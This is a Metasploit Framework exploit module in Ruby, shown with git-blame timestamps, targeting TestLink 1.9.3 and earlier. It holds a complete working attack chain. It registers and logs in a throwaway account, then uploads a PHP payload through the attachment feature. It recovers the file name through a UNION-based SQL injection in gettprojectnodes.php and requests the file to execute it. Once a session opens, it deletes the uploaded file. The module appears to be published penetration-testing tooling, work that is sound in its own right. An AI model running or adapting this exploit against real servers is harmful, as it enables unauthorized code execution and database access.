2012-08-13 07:00:10 +00:00
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
# Framework web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/framework/
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
2012-08-13 17:29:13 +00:00
|
|
|
Rank = ExcellentRanking
|
2012-08-13 07:00:10 +00:00
|
|
|
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => "TestLink v1.9.3 Arbitrary File Upload Vulnerability",
|
|
|
|
'Description' => %q{
|
|
|
|
This module exploits a vulnerability in TestLink version 1.9.3 or prior.
|
|
|
|
This application has an upload feature that allows any authenticated
|
|
|
|
user to upload arbitrary files to the '/upload_area/nodes_hierarchy/'
|
|
|
|
directory with a randomized file name. The file name can be retrieved from
|
|
|
|
the database using SQL injection.
|
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'Brendan Coles <bcoles[at]gmail.com>' # Discovery and exploit
|
|
|
|
],
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
['URL', 'http://itsecuritysolutions.org/2012-08-13-TestLink-1.9.3-multiple-vulnerabilities/']
|
|
|
|
#['OSVDB', ''],
|
|
|
|
#['EDB', ''],
|
|
|
|
],
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'BadChars' => "\x00"
|
|
|
|
},
|
|
|
|
'DefaultOptions' =>
|
|
|
|
{
|
|
|
|
'ExitFunction' => "none"
|
|
|
|
},
|
|
|
|
'Platform' => 'php',
|
|
|
|
'Arch' => ARCH_PHP,
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
['Automatic Targeting', { 'auto' => true }]
|
|
|
|
],
|
|
|
|
'Privileged' => false,
|
|
|
|
'DisclosureDate' => "Aug 13 2012",
|
|
|
|
'DefaultTarget' => 0))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptString.new('TARGETURI', [true, 'The path to the web application', '/testlink-1.9.3/'])
|
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
def check
|
|
|
|
|
2013-01-31 05:23:41 +00:00
|
|
|
base = target_uri.path
|
2012-08-13 07:00:10 +00:00
|
|
|
base << '/' if base[-1, 1] != '/'
|
2012-08-13 16:57:59 +00:00
|
|
|
peer = "#{rhost}:#{rport}"
|
2012-08-13 07:00:10 +00:00
|
|
|
|
|
|
|
# retrieve software version from login page
|
|
|
|
begin
|
2012-08-13 16:57:59 +00:00
|
|
|
res = send_request_cgi({
|
2012-08-13 07:00:10 +00:00
|
|
|
'method' => 'GET',
|
2013-01-31 05:23:41 +00:00
|
|
|
'uri' => normalize_uri(base, "login.php")
|
2012-08-13 07:00:10 +00:00
|
|
|
})
|
|
|
|
|
2012-08-13 16:57:59 +00:00
|
|
|
return Exploit::CheckCode::Unknown if res.nil?
|
2012-08-14 17:25:21 +00:00
|
|
|
|
|
|
|
if res
|
|
|
|
if res.code == 200
|
|
|
|
if res.body =~ /<p><img alt="Company logo" title="logo" style="width: 115px; height: 53px;"\s+src="[^"]+" \/>\s+<br \/>TestLink 1\.9\.3/
|
2012-08-14 17:27:12 +00:00
|
|
|
return Exploit::CheckCode::Vulnerable
|
2012-08-14 17:25:21 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
2012-08-13 16:57:59 +00:00
|
|
|
return Exploit::CheckCode::Detected if res and res.body =~ /TestLink project <a href="http:\/\/testlink\.sourceforge\.net\/docs\/testLink\.php">Home<\/a><br \/>/
|
2012-08-13 07:00:10 +00:00
|
|
|
return Exploit::CheckCode::Safe
|
2012-08-13 16:57:59 +00:00
|
|
|
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
|
|
|
print_error("#{peer} - Connection failed")
|
2012-08-13 07:00:10 +00:00
|
|
|
end
|
|
|
|
return Exploit::CheckCode::Unknown
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
def upload(base, fname, file)
|
|
|
|
|
|
|
|
boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(10)}"
|
|
|
|
data_post = "--#{boundary}\r\n"
|
|
|
|
data_post << "Content-Disposition: form-data; name=\"uploadedFile\"; filename=\"#{fname}\"\r\n"
|
|
|
|
data_post << "Content-Type: text/php\r\n"
|
|
|
|
data_post << "\r\n"
|
|
|
|
data_post << file
|
|
|
|
data_post << "\r\n"
|
|
|
|
data_post << "--#{boundary}\r\n"
|
|
|
|
data_post << "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n"
|
|
|
|
data_post << "\r\n1048576\r\n"
|
|
|
|
data_post << "--#{boundary}\r\n"
|
|
|
|
|
|
|
|
res = send_request_cgi({
|
|
|
|
'method' => 'POST',
|
|
|
|
'uri' => "#{base}lib/attachments/attachmentupload.php",
|
|
|
|
'ctype' => "multipart/form-data; boundary=#{boundary}",
|
|
|
|
'data' => data_post,
|
|
|
|
'cookie' => datastore['COOKIE'],
|
|
|
|
})
|
|
|
|
|
|
|
|
return res
|
|
|
|
end
|
|
|
|
|
|
|
|
def register(base, user, pass)
|
|
|
|
|
|
|
|
res = send_request_cgi({
|
|
|
|
'method' => 'POST',
|
|
|
|
'uri' => "#{base}firstLogin.php",
|
|
|
|
'data' => "login=#{user}&password=#{pass}&password2=#{pass}&firstName=#{user}&lastName=#{user}&email=#{user}%40#{user}.tld&doEditUser=Add+User+Data",
|
|
|
|
})
|
|
|
|
|
|
|
|
return res
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
def login(base, user, pass)
|
|
|
|
|
|
|
|
res = send_request_cgi({
|
|
|
|
'method' => 'POST',
|
|
|
|
'uri' => "#{base}login.php",
|
|
|
|
'data' => "reqURI=&destination=&tl_login=#{user}&tl_password=#{pass}&login_submit=Login",
|
|
|
|
'cookie' => datastore['COOKIE'],
|
|
|
|
})
|
|
|
|
|
|
|
|
return res
|
|
|
|
|
|
|
|
end
|
|
|
|
|
2012-08-13 17:29:13 +00:00
|
|
|
def on_new_session(client)
|
2012-10-24 05:54:17 +00:00
|
|
|
print_warning("Deleting #{@token}.php")
|
2012-08-13 17:29:13 +00:00
|
|
|
if client.type == "meterpreter"
|
|
|
|
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
|
|
|
|
client.fs.file.rm("#{@token}.php")
|
|
|
|
else
|
|
|
|
client.shell_command_token("rm #{@token}.php")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
|
2012-08-13 07:00:10 +00:00
|
|
|
def exploit
|
|
|
|
|
2012-11-08 16:42:48 +00:00
|
|
|
base = normalize_uri(target_uri.path)
|
2012-08-13 07:00:10 +00:00
|
|
|
base << '/' if base[-1, 1] != '/'
|
|
|
|
@peer = "#{rhost}:#{rport}"
|
|
|
|
datastore['COOKIE'] = "PHPSESSID="+rand_text_alpha_lower(26)+";"
|
|
|
|
|
|
|
|
# register an account
|
|
|
|
user = rand_text_alphanumeric(rand(10)+6)
|
|
|
|
print_status("#{@peer} - Registering user (#{user})")
|
|
|
|
res = register(base, user, user)
|
2012-08-13 16:57:59 +00:00
|
|
|
if res and res.code == 200 and res.body =~ /\<html\>\<head\>\<\/head\>\<body\>\<script type='text\/javascript'\>location\.href=/
|
2012-08-13 07:00:10 +00:00
|
|
|
print_status("#{@peer} - Registered successfully")
|
|
|
|
else
|
|
|
|
print_error("#{@peer} - Registration failed")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
# login
|
|
|
|
print_status("#{@peer} - Authenticating user (#{user})")
|
|
|
|
res = login(base, user, user)
|
2012-08-13 16:57:59 +00:00
|
|
|
if res and res.code == 200 and res.body =~ /\<html\>\<head\>\<\/head\>\<body\>\<script type='text\/javascript'\>location\.href=/
|
2012-08-13 07:00:10 +00:00
|
|
|
print_status("#{@peer} - Authenticated successfully")
|
|
|
|
else
|
|
|
|
print_error("#{@peer} - Authentication failed")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
# set id and table name
|
|
|
|
id = rand(1000)+1
|
|
|
|
table = 'nodes_hierarchy'
|
|
|
|
print_status("#{@peer} - Setting id (#{id}) and table name (#{table})")
|
|
|
|
begin
|
|
|
|
res = send_request_cgi({
|
|
|
|
'method' => 'GET',
|
2013-01-31 05:23:41 +00:00
|
|
|
'uri' => normalize_uri(base, "lib/attachments/attachmentupload.php") + "?id=#{id}&tableName=#{table}",
|
2012-08-13 07:00:10 +00:00
|
|
|
'cookie' => datastore['COOKIE'],
|
|
|
|
})
|
2012-08-13 16:57:59 +00:00
|
|
|
if res and res.code == 200
|
|
|
|
print_status("#{@peer} - Setting id and table name successfully")
|
|
|
|
else
|
|
|
|
print_error("#{@peer} - Setting id and table name failed")
|
|
|
|
return
|
|
|
|
end
|
2012-08-13 07:00:10 +00:00
|
|
|
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
|
|
|
print_error("#{@peer} - Connection failed")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
# upload PHP payload to ./upload_area/nodes_hierarchy/[id]/
|
|
|
|
print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)")
|
|
|
|
fname = rand_text_alphanumeric(rand(10)+6) + '.php'
|
|
|
|
php = %Q|<?php #{payload.encoded} ?>|
|
|
|
|
begin
|
|
|
|
res = upload(base, fname, php)
|
2012-08-13 16:57:59 +00:00
|
|
|
if res and res.code == 200 and res.body =~ /<p>File uploaded<\/p>/
|
2012-08-13 07:00:10 +00:00
|
|
|
print_good("#{@peer} - File uploaded successfully")
|
|
|
|
else
|
|
|
|
print_error("#{@peer} - Uploading PHP payload failed")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
|
|
|
print_error("#{@peer} - Connection failed")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
# attempt to retrieve real file name from directory index
|
|
|
|
print_status("#{@peer} - Retrieving real file name from directory index.")
|
|
|
|
begin
|
2012-08-13 16:57:59 +00:00
|
|
|
res = send_request_cgi({
|
2012-08-13 07:00:10 +00:00
|
|
|
'method' => 'GET',
|
2013-01-31 05:23:41 +00:00
|
|
|
'uri' => normalize_uri(base, "upload_area", table, id)
|
2012-08-13 07:00:10 +00:00
|
|
|
})
|
2012-08-13 16:57:59 +00:00
|
|
|
if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/
|
2012-08-13 17:29:13 +00:00
|
|
|
@token = $1
|
|
|
|
print_good("#{@peer} - Successfully retrieved file name (#{@token})")
|
2012-08-13 07:00:10 +00:00
|
|
|
else
|
|
|
|
print_error("#{@peer} - Could not retrieve file name from directory index.")
|
|
|
|
end
|
|
|
|
|
|
|
|
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
|
|
|
print_error("#{@peer} - Connection failed")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
# attempt to retrieve real file name from the database
|
2012-08-13 17:29:13 +00:00
|
|
|
if @token.nil?
|
2012-08-13 07:00:10 +00:00
|
|
|
print_status("#{@peer} - Retrieving real file name from the database.")
|
2013-01-31 05:23:41 +00:00
|
|
|
sqli = normalize_uri(base, "lib/ajax/gettprojectnodes.php") + "?root_node=-1+union+select+file_path,2,3,4,5,6+FROM+attachments+WHERE+file_name='#{fname}'--"
|
2012-08-13 07:00:10 +00:00
|
|
|
begin
|
|
|
|
res = send_request_cgi({
|
|
|
|
'method' => 'GET',
|
2013-01-31 05:23:41 +00:00
|
|
|
'uri' => sqli,
|
2012-08-13 07:00:10 +00:00
|
|
|
'cookie' => datastore['COOKIE'],
|
|
|
|
})
|
2012-08-13 16:57:59 +00:00
|
|
|
if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/
|
2012-08-13 17:29:13 +00:00
|
|
|
@token = $1
|
|
|
|
print_good("#{@peer} - Successfully retrieved file name (#{@token})")
|
2012-08-13 07:00:10 +00:00
|
|
|
else
|
|
|
|
print_error("#{@peer} - Could not retrieve file name from the database.")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
|
|
|
print_error("#{@peer} - Connection failed")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
# retrieve and execute PHP payload
|
2012-08-13 17:29:13 +00:00
|
|
|
print_status("#{@peer} - Executing payload (#{@token}.php)")
|
2012-08-13 07:00:10 +00:00
|
|
|
begin
|
2012-08-13 16:57:59 +00:00
|
|
|
send_request_cgi({
|
2012-08-13 07:00:10 +00:00
|
|
|
'method' => 'GET',
|
2013-01-31 05:23:41 +00:00
|
|
|
'uri' => normalize_uri(base, "upload_area", "nodes_hierarchy", id, "#{@token}.php")
|
2012-08-13 07:00:10 +00:00
|
|
|
})
|
|
|
|
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
|
|
|
print_error("#{@peer} - Connection failed")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
handler
|
|
|
|
end
|
|
|
|
end
|